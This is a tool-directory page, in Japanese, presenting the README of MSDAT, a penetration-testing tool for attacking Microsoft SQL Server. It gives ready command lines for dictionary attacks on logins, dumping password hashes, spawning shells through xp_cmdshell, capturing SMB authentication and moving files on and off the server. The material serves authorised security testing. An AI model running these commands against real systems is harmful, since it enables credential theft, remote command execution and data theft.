Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
msdat — MSDAT: Microsoft SQL データベース攻撃ツール | Kitploit
ツール/GitHubGitHub/quentinhardy/msdat
特権昇格パスワード攻撃エクスプロイト情報収集ペネトレーションテストデータベースセキュリティ
GitHubquentinhardy/msdat

msdat

MSDAT: Microsoft SQL データベース攻撃ツール

リポジトリを見る
1.0k145153年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
Quentin HARDY
[email protected]
[email protected]

MSDAT

MSDAT (Microsoft SQL Database Attacking Tool) は、リモートで Microsoft SQL データベースのセキュリティをテストするオープンソースのペネトレーションテストツールです。

MSDAT の使用例:

  • リモートで Microsoft データベースが待受中であり、データベースに接続するための 有効な認証情報 を見つけたい場合
  • データベース上で有効な Microsoft SQL アカウントを持っており、権限昇格 を行いたい場合
  • 有効な Microsoft SQL アカウントを持っており、この DB をホストするオペレーティングシステム上で コマンドを実行 したい場合(例:xp_cmdshell、OLE Automation、Agent Jobs)

Tested on Microsof SQL database 2005, 2008, 2012, 2014, 2016 および 2019。

Changelog

  • バージョン 2.4 (2022/12/28) :
    • search モジュールに 2 つの新しいオプション: --privs および --privs-full(現在のユーザーのロールと権限(例:ログイン権限、データベース権限)を取得)
    • search モジュールに 1 つの新しいオプション: --config(データベースの設定・情報(バージョン、データベース、ユーザー、無効化ユーザー、ストアドプロシージャなど)を取得)
  • バージョン 2.3 (2022/12/18) :
    • Microsoft SQL Server 2019 に対応
    • search モジュールに新しいオプション --schema-dump(スキーマを抽出してファイルに保存(デフォルト DB を除く))
    • search モジュールに新しいオプション --table-dump(すべてのテーブルを抽出してファイルに保存(デフォルト DB を除く))
    • search モジュールに新しいオプション --sql-shell(最小限の疑似 SQL シェルを取得)
  • バージョン 2.2 (2022/04/29) :
    • --nmap-file と -l が all モジュールと passwordguesser モジュールでも使用可能になりました。_ -l_ でターゲットのリストを指定するか、--nmap-file で nmap ファイルを指定できます。
    • 複数のバグ修正
  • バージョン 2.1 (2020/03/04) :
    • オプション --nmap-file:XML nmap ファイルからすべての mssql サービスをロード(python-libnmap のインストールが必要)
  • バージョン 2.0 (2020/03/04) :
    • Python 2 から Python 3 へ:MSDAT は Python 3 のみ に対応しました。Python 2 はサポートされません。
    • パスワード推測モジュールに区切り文字オプションを追加
    • xpcmdshell モジュールの --put-file オプションのエラー捕捉を改善
    • jobs モジュールのリバースシェルオプションを改善
    • OLE Automation モジュール - コマンド実行の改善
    • OLE Automation モジュール - Powershell リバースシェルを実装
    • エージェントジョブの一覧とそのコードを表示する新しいオプション:--print-jobs
  • バージョン 1.2 (2020/02/26) :
    • xpCmdShell モジュールに新しいメソッド:powershell を使用したバイナリファイルのアップロード(--put-file)
    • oleAutomation の改善:テキストファイルではなくバイナリモードでファイルをアップロード
  • バージョン 1.1 (2019/07/12) :
    • その他の多くのデフォルト認証情報を追加。 https://github.com/govolution/betterdefaultpasslist/ に感謝
  • バージョン 1.0 (2017/02/15) :
    • 初版リリース

Features

MSDAT (Microsoft SQL Database Attacking Tool) を使用すると、以下のことが可能です(網羅的ではありません):

  • 認証なしで MSSQL データベースの 技術情報(例:データベースバージョン)を取得
  • nmap ファイルをロードしてすべての MSSQL ターゲットをスキャン
  • 辞書攻撃で MSSQL アカウントを検索
  • 各ログインをパスワードとしてテスト(認証が必要)
  • 以下の方法でデータベースサーバー上で Windows シェルを取得
    • xp_cmdshell
    • OLE Automation
    • Jobs
  • 以下の方法でリモートファイルを ダウンロード:
    • OLE Automation
    • bulkinsert
    • openrowset
  • 以下の方法でサーバーにファイルを アップロード:
    • OLE Automation
    • openrowset
  • 以下の方法で SMB 認証をキャプチャ:
    • bulkinsert
    • openrowset
    • xp_dirtree
    • xp_fileexist
    • xp-getfiledetails
  • 任意の MSSQL バージョンで MSSQL ハッシュパスワードを盗み出す
  • 以下の方法でデータベースを通じて ポートスキャン:
    • openrowset
  • 以下の方法でデータベース(ターゲット)を通じてリモート MSSQL サーバー上で SQL リクエストを実行:
    • bulkinsert
    • openrowset
  • 以下の方法で ファイル/ディレクトリを一覧表示:
    • xp_subdirs
    • xp_dirtree
  • 以下の方法で ドライブ/メディアを一覧表示:
    • xp_fixeddrives
    • xp_availablemedia
  • 以下の方法で フォルダを作成:
    • xp_create_subdir
  • テーブル内の機密データを検索(例:認証情報)
  • データベース設定(データベース、ユーザー、ストアドプロシージャなど)を取得
  • スキーマと全テーブル情報を抽出
  • 疑似 SQL シェルで基本的な SQL コマンドを実行

Installation

MSDAT を実行するには、いくつかの依存関係をインストールする必要があります。

Ubuntu の場合:

root@kitploit:~
sudo apt-get install freetds-dev 

または http://www.freetds.org/ から freetds をダウンロード

Python の依存関係をインストール:

root@kitploit:~
sudo pip3 install -r requirements.txt
sudo activate-global-python-argcomplete

または

root@kitploit:~
sudo pip3 install cython colorlog termcolor pymssql argparse python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

freetds 設定ファイル(例:/etc/freetds/freetds.conf または /usr/local/etc/freetds.conf)に "use ntlmv2 = yes" を追加してください。 例:

root@kitploit:~
[global]
        # TDS protocol version
        tds version = 8.0
        use ntlmv2 = yes

How to begin

root@kitploit:~
python3 msdat.py -h                                                                                                                                                                                                                                                    2 ⨯
usage: msdat.py [-h] [--version]
                {all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
                ...

               _   _  __  __   _  ___ 
              | \_/ |/ _||  \ / \|_ _|
              | \_/ |\_ \| o ) o || | 
              |_| |_||__/|__/|_n_||_| 
                        
------------------------------------------------------
 _   _  __            __           _           ___ 
| \_/ |/ _|         |  \         / \         |_ _|
| \_/ |\_ \         | o )         o |         | | 
|_| |_||__/icrosoft |__/atabase |_n_|ttacking |_|ool 
                        
-------------------------------------------------------

By Quentin Hardy ([email protected])

positional arguments:
  {all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
                        
                        Choose a main command
    all                 to run all modules in order to know what it is possible to do
    mssqlinfo           to get information without authentication
    passwordguesser     to know valid credentials
    passwordstealer     to get hashed passowrds
    xpcmdshell          to get a shell
    jobs                to execute system commands
    smbauthcapture      to capture a SMB authentication
    oleautomation       to read/write file and execute system commands
    bulkopen            to read a file and scan ports
    xpdirectory         to list files/drives and to create directories
    trustworthype       to become sysadmin with the trustwothy database method
    userlikepwd         to try each MSSQL username stored in the DB like the corresponding pwd
    search              to search in column names
    cleaner             clean local traces

optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit

Examples

Modules

  • すべてのモジュールを一覧表示:
root@kitploit:~
./msdat.py -h
  • モジュールを選択したら(例:all)、そのモジュールを使用でき、モジュールの全機能とオプションを一覧表示できます:
root@kitploit:~
./msdat.py all -h

特定のモジュールが MSSQL サーバーで使用可能かどうかは、--test-module オプションで確認できます。このオプションは各 mdat モジュールに実装されています。

all module

all モジュールは、すべてのモジュールを実行します(購入したオプションに依存します)。

root@kitploit:~
python msdat.py all -s $SERVER

以下のような場合:

  • 辞書攻撃に独自のアカウントファイルを使用したい
  • 各ユーザーに対して複数のパスワードを試行し、確認を求められたくない
  • 独自のタイムアウト値を設定したい
root@kitploit:~
./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry

各モジュールでは、--charset オプションで使用する文字セットを指定できます。

mssqlinfo module

認証なしでリモート MSSQL サーバーの技術情報を取得するには:

root@kitploit:~
./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info

このモジュールは、情報を取得するために TDS プロトコル と SQL Browser Server を使用します。

passwordguesser module

このモジュールは有効な認証情報を検索します:

root@kitploit:~
./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search

--force-retry オプションは、各ユーザーに対して複数のパスワードを確認なしでテストします。

--accounts-file オプションで独自のアカウントファイルを指定できます:

root@kitploit:~
./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry

passwordstealer module

ハッシュ化されたパスワードをダンプするには:

root@kitploit:~
./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt

このモジュールは SQL Server 2000、2005、2008、2014 でテスト済みです。

xpcmdshell module

xp_cmdshell を使用してシステムコマンドを実行するには(https://msdn.microsoft.com/en-us/library/ms190693.aspx):

root@kitploit:~
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell

上記のコマンドにより、リモートデータベースサーバー上で対話型シェルが利用可能になります。

xp_cmdshell が有効でない場合、このモジュールの --enable-xpcmdshell オプションで有効化できます:

root@kitploit:~
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --disable-xpcmdshell --shell

--enable-xpcmdshell オプションは、xp_cmdshell が有効でない場合に有効にします(デフォルトでは無効)。

--disable-xpcmdshell オプションは、有効な場合に xp_cmdshell を無効にします。

smbauthcapture module

このモジュールを使用すると、SMB 認証をキャプチャできます:

root@kitploit:~
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE

SMB 認証をキャプチャするには、metasploit の auxiliary/server/capture/smb モジュールが使用できます:

root@kitploit:~
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit

このモジュールの capture コマンドは、xp_dirtree、xp_fileexist、または xp-getfiledetails プロシージャを使用して SMB 認証をキャプチャしようとします。

認証をキャプチャする SMB 認証プロシージャを選択する場合:

root@kitploit:~
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture 127.0.0.1

--share-name オプションで SHARE 名を変更できます。

oleautomation module

このモジュールは、データベースサーバー上のファイルを読み書きするために使用できます。

次のコマンドは、データベースサーバーに保存されたファイル temp.txt を読み取ります:

root@kitploit:~
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'

リモートでファイル (temp.txt) に文字列を書き込むには:

root@kitploit:~
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'

このモジュールは、データベースサーバーに保存されたファイル (C:\Users\Administrator\Desktop\temp.txt) をダウンロードするためにも使用できます:

root@kitploit:~
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt

また、このモジュールを使用して、ターゲットにファイル (temp.txt) をアップロードすることもできます:

root@kitploit:~
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txt

bulkopen module

bulkopen モジュールは以下の目的で使用できます:

  • データベースサーバーに保存されたファイルの読み取り/ダウンロード
  • データベースサーバーを介したポートスキャン
  • データベースを介したリモート MSSQL サーバー上での SQL リクエストの実行

ターゲットに保存されたファイルを読み取るには、次のコマンドを使用します:

root@kitploit:~
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'"

--method オプションで使用するメソッドを指定できます:

  • bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx)
  • openrowset (https://msdn.microsoft.com/en-us/library/ms190312.aspx)
root@kitploit:~
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset

ファイル (C:\Users\Administrator\Desktop\temp.txt) をダウンロードするには:

root@kitploit:~
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt

このモジュールは、データベースサーバーを介してポートスキャン(127.0.0.1 の 1433 と 1434)を実行するためにも使用できます:

root@kitploit:~
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433,1434 -v

ポートの範囲をスキャンすることもできます:

root@kitploit:~
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433-1438

このモジュールは、データベース ($SERVER) を介してリモートデータベースサーバー (例:$SERVER2) 上で SQL リクエスト (例:select @@ServerName) を実行するためにも使用できます:

root@kitploit:~
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'

xpdirectory module

xpdirectory モジュールは以下に使用できます:

  • 以下の一覧表示:
  • ファイル
  • ディレクトリ
  • ドライブ
  • ファイルの存在確認
  • ディレクトリの作成

特定のディレクトリ内のファイルを一覧表示するには:

root@kitploit:~
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'

特定のディレクトリ内のサブディレクトリを一覧表示するには:

root@kitploit:~
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'

ドライブを一覧表示するには:

root@kitploit:~
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media

ファイルが存在するか確認するには:

root@kitploit:~
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'

ディレクトリを作成するには:

root@kitploit:~
./msdat.py xpdirectory --s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'

search module

search モジュールは、テーブルやビューのカラム名からパターンを検索するために使用できます。 例えば、カラム名からパターン %password% を検索する場合に便利です。

パスワードパターン(例:passwd、password、motdepasse、clave)を含むカラム名を取得するには:

root@kitploit:~
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

データが含まれていないカラム名も表示したい場合は、--show-empty-columns オプションを使用してください。

ビューやテーブルのカラム名から特定のパターンを検索するには:

root@kitploit:~
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

Donation

もし私の活動を支援していただけるなら、寄付をいただけると大変感謝いたします:

  • BTC 経由:36FugL6SnFrFfbVXRPcJATK9GsXEY6mJbf
ツールをダウンロード